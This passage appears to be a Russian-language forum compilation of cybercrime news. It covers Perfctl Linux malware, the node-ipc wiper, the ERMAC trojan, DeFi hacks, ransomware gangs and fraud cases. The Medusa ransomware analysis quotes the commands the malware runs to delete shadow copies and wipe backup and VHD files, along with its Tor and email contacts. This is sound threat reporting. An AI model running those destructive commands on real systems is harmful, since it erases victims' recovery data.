пользователя в систему.
- Использование сокета Unix через TOR для внешних коммуникаций
- Удаление установочного бинарного файла после выполнения и последующий
запуск в качестве фоновой службы
- Манипулирование процессом Linux pcap_loop с помощью техники, известной как
hooking, чтобы предотвратить запись вредоносного трафика средствами
администрирования
- Подавление ошибок mesg, чтобы избежать видимых предупреждений во время
выполнения.
Вредоносная программа разработана таким образом, чтобы обеспечить стойкость,
то есть способность оставаться на зараженной машине после перезагрузки или
попыток удаления основных компонентов. Двумя такими приемами являются (1)
модификация скрипта ~/.profile, который настраивает окружение при входе
пользователя в систему таким образом, что вредоносная программа загружается
раньше, чем легитимные рабочие нагрузки, которые должны выполняться на
сервере, и (2) копирование себя из памяти в несколько дисковых пространств.
Подключение pcap_loop также может обеспечивать постоянство, позволяя
вредоносной деятельности продолжаться даже после обнаружения и удаления
основной полезной нагрузки.
Помимо использования ресурсов машины для добычи криптовалюты, Perfctl также
превращает ее в прокси-сервер, который платные клиенты используют для передачи
своего интернет-трафика. Исследователи Aqua Security также заметили, что
вредоносная программа служит бэкдором для установки других семейств
вредоносного ПО.
Ассаф Мораг, директор по анализу угроз компании Aqua Security, написал в своем электронном письме:
Вредоносная программа Perfctl представляет собой серьезную угрозу благодаря своей конструкции, которая позволяет ей ускользать от обнаружения, сохраняя при этом устойчивость на зараженных системах. Такая комбинация представляет собой сложную задачу для защитников, и, действительно, с этой вредоносной программой связано растущее число отчетов и обсуждений на различных форумах, подчеркивающих беду и разочарование пользователей, оказавшихся зараженными».
Click to expand...
Perfctl использует руткит и изменяет некоторые системные утилиты, чтобы скрыть
активность криптомайнера и программы для прокси-джекинга. Он легко вписывается
в окружающую среду, используя, казалось бы, легитимные имена. Кроме того,
архитектура Perfctl позволяет ему выполнять целый ряд вредоносных действий, от
утечки данных до развертывания дополнительных полезных нагрузок. Благодаря
своей универсальности он может быть использован для различных вредоносных
целей, что делает его особенно опасным как для организаций, так и для частных
лиц.
«Вредоносная программа всегда успевает перезапуститься».
Хотя Perfctl и некоторые из устанавливаемых им вредоносных программ
обнаруживаются некоторыми антивирусными программами, исследователям Aqua
Security не удалось найти никаких отчетов об исследованиях, посвященных этому
вредоносному ПО. Однако им удалось найти множество тем на сайтах, посвященных
разработчикам, в которых обсуждались заражения, похожие на эту программу.
Типичным является этот комментарий на Reddit, опубликованный на субреддите CentOS. Один из администраторов заметил, что два сервера были заражены криптовалютным угонщиком с именами perfcc и perfctl. Администратор попросил помощи в расследовании причины.
«Я узнал о вредоносном ПО только потому, что моя система мониторинга предупредила меня о 100-процентной загрузке процессора», - написал администратор в сообщении от 2023 апреля. «Однако процесс немедленно останавливался, когда я входил в систему через SSH или консоль. Как только я выходил из системы, вредоносная программа возобновляла работу в течение нескольких секунд или минут». Администратор продолжил:
Я пытался удалить вредоносную программу, следуя шагам, описанным на других форумах, но безрезультатно. Вредоносной программе всегда удается перезапуститься, как только я выхожу из системы. Я также проверил всю систему на наличие строки «perfcc» и нашел файлы, перечисленные ниже. Однако их удаление не решило проблему, так как при каждой перезагрузке он продолжает появляться заново.
Click to expand...
Другие обсуждения включают: Reddit, Stack Overflow (испанский), forobeta
(испанский), brainycp (русский), natnetwork (индонезийский), Proxmox
(Deutsch), Camel2243 (китайский), svrforum (корейский), exabytes, virtualmin,
serverfault и многие другие.
После использования уязвимости или неправильной конфигурации код эксплойта
загружает основную полезную нагрузку с сервера, который, в большинстве
случаев, был взломан злоумышленником и превращен в канал для анонимного
распространения вредоносного ПО. В атаке, направленной на медпот
исследователей, полезная нагрузка называлась httpd. После выполнения файл
копирует себя из памяти в новое место в каталоге /temp, запускает его, а затем
завершает исходный процесс и удаляет загруженный двоичный файл.
После перемещения в каталог /tmp файл запускается под другим именем, которое имитирует имя известного Linux-процесса. Файл, размещенный на honeypot, имел имя sh. После этого файл создает локальный командно-контрольный процесс и пытается получить права root-системы, используя CVE-2021-4043, уязвимость повышения привилегий, которая была исправлена в 2021 году в Gpac, широко используемом мультимедийном фреймворке с открытым исходным кодом.
На диаграмме ниже показан направление атаки:
На следующем изображении показаны некоторые из имен, присвоенных установленным
вредоносным файлам:
source: <https://www.wired.com/story/perfctl-stealthy-malware-infected-linux-
systems/>
Полиция Испании арестовала трех «пророссийских» хакеров по подозрению в кибератаках против стран НАТО в террористических целях.
По данным Гражданской гвардии, подозреваемых задержали за предполагаемое участие в распределенных кибератаках типа «отказ в обслуживании» (DDoS) против государственных учреждений и стратегических секторов.
Как отмечает издание, кибератаки, предположительно, совершались против веб- страниц государственных и частных организаций в правительственном секторе, критически важной инфраструктуры и основных служб в странах, которые поддерживают Украину в конфликте с Россией. Полиция опубликовала в социальной сети X видеозапись обыска в доме одного из подозреваемых, на стене которого был вывешен флаг советских времен с изображением серпа и молота.
«Эти компьютерные атаки были организованы хактивистской группой NoName057(16), [которая начала свою деятельность] после вторжения России на Украину и [которая] стала одной из самых активных. В своем учредительном манифесте эта группа признает, что "будет давать соразмерный ответ на враждебные и откровенно антироссийские действия западных русофобов"», — говорится в заявлении Гражданской гвардии.
Уточняется, что аресты прошли в Манакоре на острове Майорка, а также в Уэльве и Севилье на юге страны. Испанские правоохранительные органы продолжают расследование.
diariodesevilla.es/sociedad/guardia-civil-detiene-tres- personas_0_2001819798.html
Стартап Exaloop опубликовал код проекта
Codon, развивающего компилятор для языка
Python, способный генерировать на выходе чистый машинный код, не привязанный к
Python runtime. Компилятор развивается авторами Python-подобного языка
Seq и позиционируется как продолжение его
развития. Проектом также предлагается собственный runtime для исполняемых
файлов и библиотека функций, заменяющая библиотечные вызовы на языке Python.
Исходные тексты компилятора, runtime и стандартной библиотеки написаны с
использованием языков C++ (с привлечением наработок из LLVM) и Python, и
распространяются под лицензией
BSL (Business Source
License).
Лицензия BSL была предложена сооснователями MySQL в качестве альтернативы
модели Open Core. Суть BSL в том, что код расширенной функциональности
изначально доступен для внесения изменений, но в течение какого-то времени
может применяться бесплатно только при соблюдении дополнительных условий, для
обхода которых требуется приобретение коммерческой лицензии. Дополнительные
лицензионные условия проекта Сodon предписывают перевод кода на лицензию
Apache 2.0 через 3 года (1 ноября 2025 года). До этого времени лицензия
разрешает копирование, распространение и модификацию, при условии
использования не в коммерческих целях.
Производительность выдаваемых на выходе исполняемых файлов преподносится как
близкая к программам, написанным на языке Си. По сравнению с использованием
CPython прирост производительности при компиляции с использованием Codon
оценивается в 10-100 раз для однопоточном
выполнении. При этом в отличие от Python в Codon дополнительно реализована
возможность применения многопоточности, которая позволяет добиться ещё
большего увеличения производительности. Codon также позволяет выполнять
компиляцию на уровне отдельных функций для использования скомпилированного
представления в существующих Python-проектах.
Codon построен с использованием модульной архитектуры, позволяющей наращивать
функциональность через плагины, при помощи которых можно добавлять новые
библиотеки, реализовывать оптимизации в компиляторе и даже обеспечивать
поддержку дополнительного синтаксиса. Например, параллельно развивается
несколько плагинов для использования в биоинформатике и финансовой математике.
Для управления памятью используется сборщик мусора
Boehm.
Компилятором
поддерживается
большая часть синтаксиса Python, но компиляция в машинный код накладывает ряд
ограничений, мешающих использованию Codon в качестве прозрачной замены
CPython. Например, в Codon для целых чисел используется 64-разрядный тип int,
в то время как в CPython размерность целых чисел не ограничена. Для достижения
совместимости с Codon больших кодовых баз может потребоваться внесение
изменений в код. Как правило несовместимости вызваны отсутствием реализации
для Codon определённых Python-модулей и невозможностью использования некоторых
динамических возможностей языка. Для каждой подобной несовместимости
компилятор выдаёт детальное диагностическое сообщение с информацией как можно
обойти возникшую проблему.
](https://www.opennet.ru/opennews/art.shtml?num=58395)
www.opennet.ru
Разработчик популярного npm-пакета node-ipc выпустил обновленные версии своей библиотеки и в этом обновлении выразил свой протест против продолжающейся «спецоперации» в Украине. Новые версии пакета удаляют все данные и перезаписывают файлы на машинах разработчиков из России и Беларуси, а также создают текстовые файлы с призывами к миру.
Вайпер в node-ipc
Стоит отметить, что node-ipc загружают более 1 млн раз в неделю, и это важный пакет, на который полагаются многие другие библиотеки, включая, к примеру, Vue.js CLI.
Издание Bleeping Computer сообщает, что деструктивный код содержат версии пакета 10.1.1 и 10.1.2, которые теперь отслеживаются под идентификатором CVE-2022-23812, как малварь.
Все началось с того, что 8 марта разработчик Брэндон Нодзаки Миллер, известный под ником RIAEvangelist, опубликовал опенсорсные пакеты peacenotwar и oneday- test (как на npm, так и на GitHub). Судя по всему, эти пакеты были созданы как выражение протеста, поскольку они добавляют «призыв к миру» на рабочий стол любого установившего их пользователя.
Однако теперь обнаружилось, что некоторые версии известной библиотеки node- ipc, тоже поддерживаемой RIAEvangelist, содержат гораздо более разрушительные пейлоады, направленные на уничтожение всех данных и перезапись файлов своих пользователей. Вредоносный код, внедренный разработчиком в пакеты еще 7 марта 2022 года, ориентируется на внешний IP-адрес системы и удаляет данные (путем перезаписи файлов) только для пользователей из России и Беларуси.
Упрощенная версия этого кода, уже опубликованная исследователями, показывает, что у пользователей из России и Беларуси код перепишет содержимое всех файлов, присутствующих в системе, заменив их на эмодзи-сердца, тем самым эффективно удалит данные.
Поскольку node-ipc версий 9.2.2, 11.0.0 и более поздних включает в себя Peacenotwar, затронутые пользователи также обнаруживают на рабочем столе послание «WITH-LOVE-FROM-AMERICA.txt», где автор призывает к миру.
Исследователи из компании Snyk тоже обнаружили и проанализировали эту вредоносную активность. В блоге [эксперты пишут](https://snyk.io/blog/peacenotwar-malicious-npm-node-ipc-package- vulnerability/):
«Сейчас происходит явное злоупотребление. Критический инцидент безопасности цепочки поставок затронет любую систему, в которой будет вызываться этот пакет npm, если географическое системы положение соответствует России или Беларуси».
Аналитики Snyk подозревают, что версии node-ipc 10.1.1 и 10.1.2, наносящие ущерб системам, были удалены npm в течение 24 часов после публикации. Однако версии node-ipc 11.0.0 и выше по-прежнему доступны и содержат упомянутый компонент Peacenotwar, оставляющий «мирные призывы» на рабочем столе.
Хуже того, связанная со случившимся паника уже затронула и пользователей популярного JavaScript-фреймворка Vue.js, который тоже использует в зависимостях node-ipc. После инцидента пользователи обратились к разработчикам Vue.js с просьбой использовать только безопасные версии node-ipc, которые не пытаются уничтожить все их данные.
При этом BleepingComputer отмечает, что Vue.js — не единственный опенсорсный проект, у которого возникли проблемы из-за этого саботажа. К примеру, разработчики Лукас Мертенс и Федор уже предупреждают других разработчиков, чтобы те не использовали вредоносную версию node-ipc.
В настоящее время безопасной версией node-ipc считается 9.2.1. Однако разработчикам в целом стоит проявлять осторожность при использовании node-ipc и других библиотек RIAEvangelist, поскольку нет никаких гарантий того, что будущие версии любой его библиотеки будут безопасны.
Реакция сообщества
Нужно сказать, что это уже второй протест от опенсорсного разработчика, с которым сообщество сталкивалось за последнее время. Напомню, что первым был Марак Сквайрс, автор библиотек faker и colors, которые насчитывают более 20 млн загрузок еженедельно только через npm.
В декабре прошлого года многие разработчики обнаружили, что обе библиотеки работают некорректно, тем самым влияя на работоспособность их собственных продуктов. Обе библиотеки извлекали тарабарщину вместо кода, предварявшуюся словами «LIBERTY LIBERTY LIBERTY» (англ. «Свобода, Свобода, Свобода»). В частности, проблемы возникли у всех, кто использует Amazon Cloud Development Kit.
Оказалось, что автор пакетов умышленно испортил свой код, а в файле readme, сопровождавшем вредоносное обновление, появилось сообщение: «Что на самом деле произошло с Аароном Шварцем?». Это же сообщение он продублировал в Twitter, приложив ссылку на Reddit, где осуждалось, что Шварц был убит после того, как обнаружил детское порно на серверах Массачусетского технологического института.
Таким образом Сквайрс решил ради мести корпорациям и коммерческим потребителям опенсорсных решений. Дело в том, что те часто полагаются на бесплатное ПО, поддерживаемое сообществом, однако, по словам Сквайрса, ничего не дают сообществу взамен. Еще в ноябре 2020 года разработчик писал, что более не собирается поддерживать корпорации и делать для них «бесплатную работу». Коммерческим организациям он советовал рассмотреть возможность создания форков или выплачивать ему шестизначную зарплату.
Тогда многие осуждали Сквайра, а теперь еще большей критике за свой саботаж подвергается RIAEvangelist, который в общей сложности поддерживает более 40 npm-пакетов. Почти все согласны с тем, что случившееся выходит за рамки «мирного протеста» и развертывание деструктивных полезных нагрузок в популярной библиотеке – крайне неэтичный поступок. Многие и вовсе убеждены, что это подрывает все принципы и устои опенсорсного сообщества.
«Ты только что успешно разрушил все сообщество опенсорс-разработчиков. Теперь ты счастлив, @RIAEvangelist?», — [спрашивает](https://github.com/RIAEvangelist/node- ipc/issues/233#issuecomment-1070347150) активиста один из пользователей.
«Даже если умышленные и опасные действия RIAEvangelist будут восприняты некоторыми как легитимный акт протеста, как все это отразится на будущей репутации сопровождающего и его вкладе в сообщество разработчиков?», — спрашивают другие.
К тому же пользователи обнаружили, что теперь RIAEvangelist пытается замести следы содеянного и активно редактирует и [удаляет](http://web.archive.org/web/20220316015553/https:/github.com/RIAEvangelist/node- ipc/issues/233) предыдущие комментарии.
В городе Яранск Кировской области полиция задержала трёх молодых людей в возрасте от 15 до 18 лет, которые подозреваются в похищении подростков. Об этом сообщает Telegram-канал «Shot».
Как выяснили следователи, подозреваемые являются студентами местного колледжа. Они похитили несовершеннолетних и перевезли их в Чувашию, где заставляли заниматься телефонным мошенничеством и вымогать деньги под женским аккаунтом.
Полиция выяснила, что студенты выбирали скромных детей из неблагополучных семей, после чего подкарауливали их возле школ.
В настоящий момент полиция занимается поисками лидера преступной группировки.
Компания Google объявила о радикальном изменении для пользователей и разработчиков приложений Android, которое может оказать огромное влияние на экосистему Android в целом.
На данный момент стандартным форматом публикации приложений в онлайн-магазине Google Play Store является APK. Начиная с августа 2021 года Google потребует, чтобы все новые приложения Google Play публиковались с использованием нового формата — Android App Bundle, или AAB.
Как обещает Google, формат Android App Bundle сделает приложения в среднем на 15% меньше, чем при использовании APK. Такие приложения будут быстрее загружаться и обеспечат лучшую безопасность.
Источник: Читать статью полностью
Проведенный в ThreatFabric анализ показал, что новый банковский троян для Android почти полностью заимствует код Cerberus, слитый в Сеть полгода назад. В настоящее время ERMAC, использующий оверлеи для кражи данных из финансовых приложений, активно распространяется на территории Польши.
Нового Android-банкера начали рекламировать на подпольных форумах минувшим летом. В середине августа его предлагал взять в аренду один из операторов схожего по функционалу BlackRock.
В конце того же месяца ERMAC был пущен в оборот. Вначале его маскировали под Google Chrome, позднее — под банковский клиент, медиаплеер или антивирус McAfee. Полякам его раздают под видом приложения службы доставки или программы для доступа к госуслугам.
Примечательно, что с появлением ERMAC банкер BlackRock перестал получать обновления. Не исключено, что преступная группировка сменила оружие, воспользовавшись утечкой исходников Cerberus (код этого RAT-зловреда был летом выставлен на аукцион, но затея потерпела неудачу, и лот стали предлагать бесплатно).
Троян ERMAC, как и другие его собратья, умеет воровать СМС и контакты из адресной книги, открывать произвольные приложения, налагать фишинговый экран поверх окон других Android-программ. В комментарии для The Hacker News представитель ThreatFabric уточнил: новобранец способен генерировать оверлеи для 378 банковских приложений и кошельков.
Его возможности также позволяют по команде чистить кеш указанных программ и отыскивать в логах список аккаунтов. Чтобы затруднить анализ, создатели ERMAC используют обфускацию и шифруют строки кода, используя криптоалгоритм Blowfish. Данные, которыми зловред обменивается с C2-сервером, тоже подвергаются шифрованию — 128-битным ключом AES в режиме CBC.
• Source: <https://www.threatfabric.com/blogs/ermac-another-cerberus- reborn.html>
• Source: <https://thehackernews.com/2021/09/new-android-malware-steals- financial.html>
40-летний житель Минского района несколько лет приобретал учетные записи популярных криптобирж и перепродавал их в два, а иногда и в три раза дороже. Для реализации цифровых товаров он создал интернет-магазин, который продвигал как в клирнете, так и в даркнете.
Стражам галактики удалось установить 350 эпизодов преступной деятельности фигуранта. В итоге майор Доигралес изъял с криптокошельков бедолаги около 100 000$.
В настоящее время решается вопрос об обращении полученных денежных средств в доход государства.
Платформа для продажи токенов MISO децентрализованной биржи SushiSwap имела уязвимость, которая могла быть использована для кражи ETH на $365 млн, но исследователи обнаружили ее раньше хакеров.
Спустя неделю после того, как Poly Network подверглась атаке на $600 млн, еще один крупный проект DeFi едва не постигла та же участь. Речь идет о децентрализованной бирже (DEX) SushiSwap, которой удалось избежать потери ETH на $365 млн благодаря «белому хакеру».
Согласно [статье](https://www.paradigm.xyz/2021/08/two-rights-might-make-a- wrong/) в блоге венчурной компании Paradigm, партнер фирмы по исследованиям samczsun начал изучать код смарт-контракта для продажи токенов BitDAO на платформе MISO SushiSwap – «стартовой площадке» для новых токенов. Размещение токенов прошло без проблем и собрало $365 млн.
Однако исследователь samczsun сообщил, что обнаружил потенциальные проблемы со смарт-контрактом. Дальнейшие эксперименты выявили уязвимость, которая могла привести к краже всех ETH из контракта.
«Маленькая уязвимость оказалась гораздо крупнее. Я не просто столкнулся с ошибкой, которая позволила бы перебивать ставки других участников. Это была уязвимость на $365 млн», – написал samczsun.
Он рассказал об уязвимости коллегам по Paradigm Георгиосу Константопулосу (Georgios Konstantopoulos) и Дэну Робинсону (Dan Robinson), чтобы перепроверить свою гипотезу. Они быстро связались с командой SushiSwap, чтобы обсудить возможные решения.
После обсуждения между Paradigm, SushiSwap и представителями платформы по выявлению ошибок Immunefi, они пришли к решению: проводящая продажу токенов команда BitDAO вручную завершит аукцион, чтобы нейтрализовать потенциальную угрозу.
Команда SushiSwap поделилась дополнительной информацией об обнаруженной уязвимости и отметила, что деньги не были потеряны. Децентрализованная биржа приостановит работу аукциона MISO до тех пор, пока смарт-контракт не будет обновлен.
? REvil #Ransomware group just update about "Kaseya Attack Info" on the onion Name and Shame website.
"JsUniversal decryptor for only 70,000,000$ Bitcoins"
REvil has named its price. $70,000,000 USD in Bitcoin.
Attached image is directly from REvils website:
Управлением по расследованию организованной преступной деятельности МВД России закончено предварительное расследование уголовного дела в отношении семерых участников организованной преступной группы. Они обвиняются в мошенничестве крупных размеров.
Фигуранты взламывали почтовые ящики организаций и получали информацию о намерениях коммерсантов. Затем они представлялись от имени известных производителей или поставщиков и предлагали выгодные условия для заключения договоров. После получения оплаты, деньги похищались, и общение с потерпевшими прекращалось.
Обвиняемые использовали локальную сеть с шифрованным соединением и серверы в разных регионах России для конспирации. Банковские операции проводились с использованием удаленного доступа. Ущерб от преступной деятельности составил более 17 млн рублей.
Проведены обыски в городах Твери, Йошкар-Оле, Барнауле, Новосибирске и Тамбове. Изъята компьютерная техника, 2,2 млн рублей и автомобиль стоимостью более 14 млн рублей, наложен арест на все изъятое. Уголовное дело направлено в суд для рассмотрения. Расследование по другим участникам продолжается.

В 2023 году набирает обороты программа-вымогатель, известная как Medusa, которая нацелена на корпоративных жертв по всему миру и требует выкуп в миллионы долларов.
Операция Medusa началась в июне 2021 года, но ее активность была относительно низкой, жертв было немного. Однако в 2023 году банда ransomware активизировалась и запустила "блог Medusa", который использовался для утечки данных жертв, отказавшихся платить выкуп.
На этой неделе Medusa привлекла внимание СМИ после того, как взяла на себя
ответственность за атаку на район государственных школ Миннеаполиса (MPS) и
поделилась видеозаписью похищенных данных.
Может ли настоящая Medusa встать?
Многие семейства вредоносных программ называют себя Medusa, включая ботнет на базе Mirai с возможностями выкупа, вредоносную программу Medusa для Android и широко известную операцию MedusaLocker с выкупом.
В связи с широко используемым названием в сообщениях об этом семействе программ-вымогателей возникает путаница, многие считают, что это то же самое, что и MedusaLocker.
Однако операции Medusa и MedusaLocker совершенно разные.
Операция MedusaLocker была запущена в 2019 году как Ransomware-as-a-Service с многочисленными филиалами, примечанием о выкупе под общим названием How_to_back_files.html и широким разнообразием расширений зашифрованных файлов.
Для ведения переговоров MedusaLocker использует веб-сайт Tor по адресу qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion.
Однако операция Medusa ransomware началась примерно в июне 2021 года и использует записку с требованием выкупа под названием !!!READ_ME_MEDUSA!!!.txt и статическое расширение зашифрованного файла .MEDUSA.
Операция Medusa также использует веб-сайт Tor для переговоров о выкупе, однако
их сайт расположен по адресу
medusacegu2ufmc3kx2kkqicrlcxdettsjcenhjena6uannk5f4ffuyd.onion.
Как Medusa шифрует устройства Windows
BleepingComputer смог проанализировать шифровальщик Medusa только для Windows, и на данный момент неизвестно, есть ли у них шифровальщик для Linux.
Шифровальщик для Windows принимает параметры командной строки, которые позволяют субъекту угрозы настроить способ шифрования файлов на устройстве, как показано ниже.
Command Line
Option | Description
---------------------
-V | Get version
-d | Do not delete self
-f | Exclude system folder
-i | In path
-k | Key file path
-n | Use network
-p | Do not preprocess (preprocess = kill services and shadow copies)
-s | Exclude system drive
-t | Note file path
-v | Show console window
-w | Initial run powershell path (powershell -executionpolicy bypass -File %s)Click to expand...
Например, аргумент командной строки -v заставит программу-вымогатель отобразить консоль, показывающую статусные сообщения по мере шифрования устройства.

Консольное окно программы Medusa ransomware
При обычном запуске, без аргументов командной строки, программа Medusa ransomware завершает более 280 служб и процессов Windows для программ, которые могут предотвратить шифрование файлов. К ним относятся службы Windows для почтовых серверов, серверов баз данных, серверов резервного копирования и программного обеспечения безопасности.
Затем программа удалит теневые копии томов Windows, чтобы предотвратить их использование для восстановления файлов.
deletes shadow volume copies
vssadmin Delete Shadows /all /quiet
vssadmin resize shadowstorage /for=%s /on=%s /maxsize=unboundedClick to expand...
Эксперт по вымогательскому ПО Майкл Гиллеспи также проанализировал шифровальщик и сообщил BleepingComputer, что он шифрует файлы с помощью шифрования AES-256 + RSA-2048 с использованием библиотеки BCrypt.
Гиллеспи также подтвердил, что метод шифрования, используемый в Medusa, отличается от метода, используемого в MedusaLocker.
При шифровании файлов программа-вымогатель добавляет расширение .MEDUSA к именам зашифрованных файлов, как показано ниже. Например, файл 1.doc будет зашифрован и переименован в 1.doc.MEDUSA.

Файлы, зашифрованные программой Medusa Ransomware
В каждой папке ransomware создаст записку о выкупе под названием !!!READ_ME_MEDUSA!!!.txt, содержащую информацию о том, что произошло с файлами жертвы.
В записке о выкупе также будет указана контактная информация расширения, включая сайт утечки данных Tor, сайт переговоров Tor, канал Telegram, Tox ID и адрес электронной почты key.medusa.serviceteam@protonmail.com.
Переговорный сайт Tor находится по адресу medusacegu2ufmc3kx2kkqicrlcxdettsjcenhjena6uannk5f4ffuyd.onion.

Записка о выкупе Medusa Ransomware
В качестве дополнительного шага, предотвращающего восстановление файлов из резервных копий, программа Medusa ransomware выполняет следующую команду для удаления локально хранящихся файлов, связанных с программами резервного копирования, такими как Windows Backup. Эта команда также удалит жесткие диски виртуальных дисков (VHD), используемые виртуальными машинами.
del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf %sBackup*.* %sbackup*.* %s*.set %s*.win %s*.dsk
Click to expand...
Переговорный сайт Tor называет себя "Secure Chat", где каждая жертва имеет уникальный идентификатор, который может быть использован для общения с бандой ransomware.

Переговорная площадка "Медуза" с защищенным чатом
Как и большинство корпоративных программ-вымогателей, Medusa имеет сайт утечки данных под названием "Medusa Blog". Этот сайт используется как часть стратегии двойного вымогательства, когда банда сливает данные жертв, отказывающихся платить выкуп.

Переговорная площадка "Медуза" с защищенным чатом.
Когда жертва добавляется к утечке данных, ее данные не публикуются немедленно. Вместо этого субъекты угроз предоставляют жертвам платные опции, позволяющие продлить обратный отсчет времени до публикации данных, удалить данные или загрузить все данные. Каждый из этих вариантов имеет различные цены, как показано ниже.

Варианты утечки данных
Эти три варианта делаются для оказания дополнительного давления на жертву,
чтобы напугать ее и заставить заплатить выкуп.
К сожалению, никакие известные слабые места в шифровальщике Medusa Ransomware
не позволяют жертвам бесплатно восстановить свои файлы.
Исследователи продолжат анализ шифровальщика, и если слабые места будут
найдены, мы сообщим об этом на bleepingcomputer[.]
source: bleepingcomputer[.]com/news/security/medusa-ransomware-gang-picks-up- steam-as-it-targets-companies-worldwide
Whatsapp and Instragram off the air in Brazil, does anyone know anything?
10 июня аналитики Arkham Intelligence предупредили о возможном взломе DeFi- протокола ликвидности UwU Lend. Предварительный ущерб оценили в $19,3 млн.
__https://twitter.com/x/status/1800143513016750135
По данным исследователей Cyvers Alerts, хакер вывел средства за три транзакции и уже начал конвертировать активы в ETH.
__https://twitter.com/x/status/1800142992973463783
За два дня до инцидента он взаимодействовал с миксером Tornado Cash для финансирования взлома. При этом система анализа Cyvers обнаружила развертывание вредоносного контракта до перемещения средств.
Представители UwU Lend отреагировали на предупреждения примерно спустя два часа после начала атаки и сообщили о приостановке протокола.
__https://twitter.com/x/status/1800159455767843009
«Будьте уверены, нас немедленно проинформированы о ситуации, и мы принимаем все необходимые меры и усилия. Следите за дальнейшими обновлениями», — говорится в публикации.
По данным журналиста Колина Ву, UwU Lend запущен соучредителем закрывшейся криптобиржи QuadrigaCX Майклом Патриным, известным под псевдонимом 0xSifu.
Проект является форком Aave и поддерживает кредитование в алгоритмическом стейблкоине MIM.
Получил письмо в котором пишут про то что банки объявили охоту за головами
мошенников, платят лям, вот выдержка из письма:
"Вы, наверное, уже слышали, что крупные банки запустили акцию, целью которой
является выявление и поимка мошенников? Тому, кто предоставит информацию, с
помощью которой злоумышленников удастся поймать, получит 1 млн рублей."
Максима Столыпина рекламировали в соцсетях как успешного трейдера. Мужчина обещал «поднять» деньги клиентов до 40%, покупая на их средства криптовалюту и продавая её значительно дороже.
По словам клиентов, это работало: люди отправляли Максиму сотни тысяч рублей, а тот высылал им разницу после продажи крипты. Всё это сопровождалось роликами о роскошной жизни трейдера - офис в башне Империя, жильё в Neva Towers, покупки в ЦУМ, дорогие авто.

Спустя несколько месяцев Столыпин стал задерживать выплаты, а затем и вовсе пропал - почистил переписки, удалил личный телеграм-канал и канал с отзывами.
Click to expand...
Клиенты забили тревогу и провели собственное расследование. По их словам, парня на самом деле зовут Артём Мурашев, ему 24 года. Нашлись и члены команды трейдера, о которых он регулярно рассказывал клиентам. «Специалисты» уверяют, что они лишь актёры, которым мужчина платил по 6-7 тысяч за съёмки.
Одна из пострадавших пошла в Сити, чтобы лично разобраться с мошенником, но девушку к апартаментам не подпустили. Сейчас люди по всей стране и за её пределами массово пишут заявления в полицию и прокуратуру - речь идёт о многомиллионных потерях.
Серверы тайваньской компании Gigabyte подверглись атаке вируса-вымогателя. Хакеры, стоящие за взломом, грозятся опубликовать 112 Гбайт конфиденциальной корпоративной информации, если производитель материнских плат, видеокарт и другой компьютерной техники не согласится с их требованиями.
В разговоре с порталом The Record представитель Gigabyte подтвердил взлом. Аналогичное сообщение о происшествии было опубликовано на тайваньском сайте производителя. По словам представителя, инцидент не затронул информацию, связанную с производственной цепочкой компании. Атаке подверглись лишь несколько внутренних серверов в тайваньской штаб-квартире Gigabyte, которые сразу же были отключены и изолированы от остальной внутренней Сети.
В настоящий момент компания выясняет, каким образом хакеры пробились через систему безопасности её Сети, украли файлы и зашифровали локальные данные. К делу также подключились местные органы правопорядка. Gigabyte не стала называть хакеров, стоящих за этим взломом. Однако порталу The Record удалось выяснить, что руку приложила группировка RansomExx. Свои требования выкупа представители группировки опубликовали в даркнете. Если компания не согласится с их требованиями, злоумышленники грозятся опубликовать информацию, которая была украдена:
«Мы загрузили 112 Гбайт (120 971 743 713 байт) ваших файлов и готовы их опубликовать. Многие из них находятся под соглашениями о неразглашении, подписанными с компаниями Intel, AMD и American Megatrends. Источники утечек: [отредактировано]gigabyte.intra, git.[отредактировано].tw и другие», — написали хакеры на своей странице в даркнете.
Для примера они также опубликовали скриншоты некоторых украденных файлов.
Gigabyte стала не единственным производителем компьютерного оборудования, который в последнее время подвергся аналогичным атакам. В прошлом жертвами вирусов-вымогателей стали компании Acer, AdvanTech, Compal, Quanta, Garmin и другие.
Хакерская группировка RansomExx, начавшая свою деятельность летом 2020 года, также ответственна за взлом IT-систем департамента здравоохранения итальянского Лацио. Они заблокировали работу портала, использовавшегося для регистрации на вакцинацию от COVID-19 жителями столицы и окружающих регионов.
• Source: <https://therecord.media/motherboard-vendor-gigabyte-hit-by- ransomexx-ransomware-gang/>
Федеральный окружной суд Коннектикута не стал исключать из материалов дела об интернет-мошенничестве показания россиянина Олега Кошкина, полученные Федеральным бюро расследований (ФБР) после его ареста в сентябре 2019 года.
Сам Кошкин в рамках этого уголовного дела обвиняется в сговоре и пособничестве преднамеренному взлому защищенного компьютера.
Россиянин просил изъять показания, ссылаясь на Пятую поправку к Конституции США. По словам Кошкина, сказанное представителям ФБР после ареста не может быть приобщено к делу, поскольку его права не были озвучены ему на русском языке, вследствие чего он не совсем понимал происходящего.
«После просмотра аудиозаписи соответствующей части допроса, заслушивания показаний Кошкина, переводчика с русского на английский, присутствовавшего на допросе, другого переводчика, а также рассмотрения заявлений сторон и ознакомления с вещественными уликами в ходе слушаний об исключении доказательств я пришел к заключению, что Кошкин сознательно и добровольно отказался от своих прав по правилу Миранды [правило Миранды — требование уведомлять лицо о его правах при задержании.]», — говорится в решении судьи Майкла Ши.
По версии американской прокуратуры, в период приблизительно с сентября 2013 по декабрь 2017 года Кошкин совместно с гражданином Эстонии Павлом Цурканом, другим обвиняемым по данному делу, вопрос об экстрадиции в Соединенные Штаты которого в настоящее время рассматривается судом Эстонии, занимались разработкой вредоносного ПО Crypt4U, которое использовалось для взлома компьютеров.
«Crypt4U - это сервис, который шифрует вредоносное ПО, чтобы избежать обнаружения антивирусами, в том числе популярными, которые используются многими пользователями компьютеров в США. Целью и намерением обвиняемых и их сообщников при использовании Crypt4U было позволить распространителям и кодировщикам вредоносного ПО снизить шансы того, что их вредоносное ПО будет обнаружено антивирусами, установленным на компьютерах, на которые они нацелены», — поясняется в обвинительном заключении.
В материалах дела указывается, что услугами Кошкина и Цуркана неоднократно пользовался в том числе Петр Левашов, обвиняемый в США в совершении киберпреступлений. В сентябре 2018 года россиянин сознался в умышленном взломе защищенного компьютера, сговоре, электронном мошенничестве и хищении персональных данных при отягчающих обстоятельствах.
